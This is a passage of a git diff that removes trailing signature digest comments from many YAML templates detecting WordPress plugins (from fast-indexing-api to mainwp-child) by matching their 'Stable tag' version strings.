'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b10bd6b5578293d0345cb337f079df38330305cb2bee4efbd3a4a301e5e743b002202ccf0b6a09f4990034aa0fb7129d0cc1264fd31fc3c0e948cc34df25b17d8e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index a39f818e58..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200317184a835ec22cfe0c571849d5d25095f1ba91896fc355b318fc7a91dd1a2402210096075d35b060c392b4bfc17f4d81b47af6553d987291e1a3b02e5602bca3d33e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 5191564f49..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011ee966c85cbe2ce759599732d28ad86df5bae67b2131a7833aa20ceb27233570221008ddfa125e5af2253fbdc1a523e2f0e0cb52e27ce55f9c077fc7cbb40e3231e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index df1d1f7b46..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100837581dc3a37f7ed760a1903128dc33757c768d84a527acc82fe9468c5ab2de5022100d2ebc0f9ffdf3dc1d82c3b33d36908013f492a561e7cd7d5624102b69f9e3413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index b5e34595ae..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001e1d84d01e7e229a6626c9ebc59026e36f92ca09ba0ce5664cea04fb0de3854022100a1dafb878263386e3846dbafac0d61449e24dcbfc3f238c47031abfe2601b79d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index fa95a3e594..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ca2448fddb39bf97bcf1a12953f8e842e732926912a208565145ea97f526cfc02205fc3374614ee22eb69ab95e5f2d86a00bfce2ae2a608a05c8a9da7777ec96ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 6027fa8f51..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070fdc7bda5ef5f00d0d63d3adf6f75c5ad4e2db10061af01a67ce76d93fe21f202206f3bdc891da3526b04a0dcb15b25c1554a30551e1fb399312c64de29e0c785ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 6a702c7e80..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100db5360f5ed8ce8134242cc716696d413555ccf4cef8f90a7e97f5924d60d4c8c0221009a8003aaa2e063073856445740a96f66e77ba5ab4d2814d4f80d93d780450f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index b899d2e02e..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100876b33965933b17486a2deac195b16a077df691dcb84b8b64b55147e2cbb5c8d02202f0dfc077614fd83a6642875dabeab1eeecfcef2f597a0cfa76b6c236c036472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 6e7424bbac..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec4aece1dbb41a25f3e6f50cc93a6233eccec3dbf2f26bc7a716084113b44fbd022100c6ec491e49a8009249fef67609cb76f56203ddd8f3c649f5e475ad49ed49f53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index d5c83fd900..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea913e467b762f85e1106babb335e1ab06ab55f497bc44c3334babf6cc591c14022100c8f510e6b97301fd9ca3f965fbe57bd73d38185fa05d3e888a7f96a4770325bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index e9b24442d6..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a545d3072e7e6f179f9b8c0cbd21e81cba86acaaec5773245ed2e0ee5c2bf75302207dd1dd2d4004b60bf36db7005726f25c539897dca31a4b6a717bf42efff00614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 1ffc085247..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e64681b525d896c9fe6d69852b1ea1599fca1dae3cced69488abecb44c9797d022100a7bcc251d1f1b79d85f45e0ea3fb8f2ceeaf2d2c5649a82a81f5f64276ef78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 9bfc6be4e6..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b380113ba0fbe78b6351143d75a173b0598d66ad06170aeceefa63d9bc51be7302210097965a4be1d7c86084cc94eeec7d2387b2b6b22c8a170b9516eb7bf8ecd08e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 0f32c064ec..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f892a000ca11a7b81538c7efa19586e2e603822638af74b609fea0cb973b1bb9022100b0fe4efe1e23ea5e54a4b887b765490d2ea95b0540d19a87bf4ec53da6a12b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7f229ffd09..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220344adf4720d0614d9f46e5870fbd5d50ac6847be431a97a03c0305532d09ede7022100e29c0bb53b6944da60a93836d0f34a024354ba42e41c2c2056ee0e7612ed4ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 007315de90..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e0bdcbe970bb8215319c81551e6e52f697cc2ca7080feadb03272e97ce0028b0220412dbf6cd84d42b07a9a0b4867fc51d32cb23e43d61efbbdf568a804d3ea6c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 6e747c3fea..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c40baf409f0f1c276b6f4115a9bc282c72196c95319c903ad0576d18377bc01022100b18eab41e8d9b72f9d363133d236137994d3964a194030974cac83df4555a08f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index d8c9ad322d..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6973dcd64220121888192d431871f10554586f6f1b54afb24cf7c3fd9f4e2240221008119ab4923aac426cdddd53751088327815e85a1adcafae46a59b54c22361ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index d2832ce485..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206cc101b572888023520fff3a72b2b6901f01020ea7a569fda3ecc8044395a8b7022100b25acf240c90d37d05bc3f06fc0245c7f8274d7349443909487b68bc773bc8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 62bc66365d..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022052e59fec33b3a88328a910980d0c98a43cc9d152a96cda146324f3390da44669022100b4087868d9228de81bcbdc006294c57faaad44296cd169bf1b056aa32b691631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index e8bc74cad0..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ad51a4a152083a14e7a505348c90b23d5da746b63f25b9ebc7bd45da071717d022100c3ddd0642f52c80f77961a165e653f3305b79c0b864181a73f37b6c02117d5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 2613a59f42..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220489170f01df05330c41ca72d1bf56f54832f682af1c44c9ff524f388375b42ab022100b2a4c77397ac9edda329f83038ddd917cba4fd5147e0dc1fe00528533008ce5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index b1ef1931c1..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bbab61c93f44fc5143db252bfd59528d9ed798eb27d63e297280d70b66acd586022012578ab0ecd4c3e265ab6a7fafa2a60db604065c8058c49887c1b9bc032eb6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 0ded8304a2..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f719dda0da3e33ec5c491dc09bbabc528afdd966d24f8e1058f1c0ecd8f3db50022045397913cd7ecf07f1a54d02ac07e77ad0b2207ccfaf79f2884f2914a2faf989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 8bdb78d290..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5b0c06606b951164fe78184031cc69c3a16b044875fcdb99195e78f058db1b002207085cdb22a86867fbb4ad42d3ac4375a8bfc9fa3d9bdb488ea1c22786daa6b49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index e47ab00611..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039b47a11518e6882ccb9171a0b204fd1f6aa067be0a483564d0f8af092e8732502202fa961666d1486c8b6330525347e7ce697cc44c59d6bdb060976345ac7097c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4bd1f0ff20..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010e0124b97e700b3edb895a587df747e4bb9c39c26b1e5fa9410df7e5fdeddc60221009f24d674544eccb028d57f58be74adc9d57ab086bd59b7bb3a2d20bfc0008ebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 90edb6f6e4..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c13f935db49042cd1f1d5a8e1411b269a8beb77480cd74be8f703d2586b3f3e80220452154536d09b95825957d3e6557fe580483bec7afea3edcc108eaac6be9baba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 776e887ca0..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220539bdebca518f094d3d90d7eccf9642256e88c648d3e90d25214484352ad29ec022100893162c2a2b7fc264bbd9bacf5649beac569ef0a0cb5e74793ffdb9dcbba9eee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 6d7148f74d..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad4cf6f9c78850f5d05ee9facdee04977979ce5c185a14528cb0ab62d9dc2a3402205702fcbd7623a511a95a14765745545f54948b38fe8063212fbd21bd5e1de42d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1cebb86420..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013f22718de938efb4f834631b2f1269515f94d71e8b8d49e8d638464d7f0e671022057501201d4712c5b4496cac12668cb439cda539311931928a62c8878ede68e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index fee22a59ab..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2f6f046b9be843f1d05b67066b8ab660a66675f4916c56d17b6152bdf38732b0220221804542d9ea58e53db0d3fa5f78f3735023c281b45eceec1edcbe0b083583a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 38eac717bc..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e371ea8f879db939e010063275bf0e3062a9037132b63d5641468cbfccb38b4702210080d23c19a261a64748c6d6c1d471af550964c43e39491d97f17030c0015cb1a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 5f2218727c..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1839589248b334469dfeee8b3109060b0204f73295f26a1b444768a212dcc5d022100a4e05b80baa97779983a42662f4cf67397b68330632fa7f245407a9f1e601806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 993edba017..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100831287914ddf33e63131640614e424e5b4ed172e0819601b6928b5627a074c370220183c2fb1b37a1ba6834cb475747a9119f437aa7bd005849f34b0cfa21ab2818d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index fb1717a51a..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004157668c6c634111319b62d146ee5f5f26c09b008c90c13d56f6b59e9d5b8bf022100a06d3954270f37316d594ee02d40683656d328e8e85aaad62966684f2604b41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index ece3968727..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d65d3cadf2a116752bbc432f3cc66dec9f305abd5ed15a5e9383839c21c2470b022028fc7046980d3418db9d406f5a250f5370d1a4ab9c1ba3b508ac711f630ce456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index b93d2a79f9..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f1196a3192c09e084c38fc7b1f1d643db581fcc32faa3b0a5c4e9db641db51b022100c6935730ff8b7329e3b2da130cdfe68bf314b39348319334721afeba9ffb9afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7414562f63..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c858f45c7a2383ebc8420d602d47aa9a35fe8748eee3af1c44191abaab28ccf6022100d6baa80a061a464afee42aead80156886af1cb359a3f64491be178c0c536c659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 3f170b92b7..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205624143a915e9d3c85b85283193802ae7d97133a2348c19e284c94c7a916405c02206cf4e2422a85a63fecf64e75f9513816b18d217564c93286437be9877a8d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4a206da20f..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6d52150d114986ec6ee2eceacc4b66c0c9ed64333606158ca48b351ebb0b1cc022025fc962a4aff0b9f639250472e633f5c6616605843d5981f8da00be7b043f30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index e50285eecb..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220197d8fdc8cb79c4493b32bc01d9395921a5a8bdc531610e28429d14d017997ca02204b1aebda47ef35e4f7ba2999b89f4016ec356b9cf81c7cfae568600581b3092f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 76086fb1a0..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e5380d9edbe2318caa9a8476c8feaba0049c1bcc3debf44fd2407879a880b0a0220240e2ec65ebb18b023a951572e2c6b146ca86525956734472cb844d0e23c8e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 76bef40f61..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c6284b5990c7af99b384c9c40fde1243cb5a3341f791e3e2b3dde291d8cf2e302202ff51ddab55f786bcc131cc0cbaf38541a3e00b4742ab680b604ed6fd7239dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index c43eb5dd1f..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a786df7fdee13c44d18c14e61c7a0660cf5e6c19e6438a88a2a58183c435c6aa022100a305eda4c522d15553fa0429ba832b45c685d31059d781ecf4e12a04e9266f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a3205fdd6e..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033a7c8b3b77d26e84e73d79da0b6c188b37d6d4dcfaaf5aa95d8f76008509c4e022100d4e25c6806c77a708c33ee5a11124faf3993c72e0500dd448a8b8aba6edc62f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index a0258a5472..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 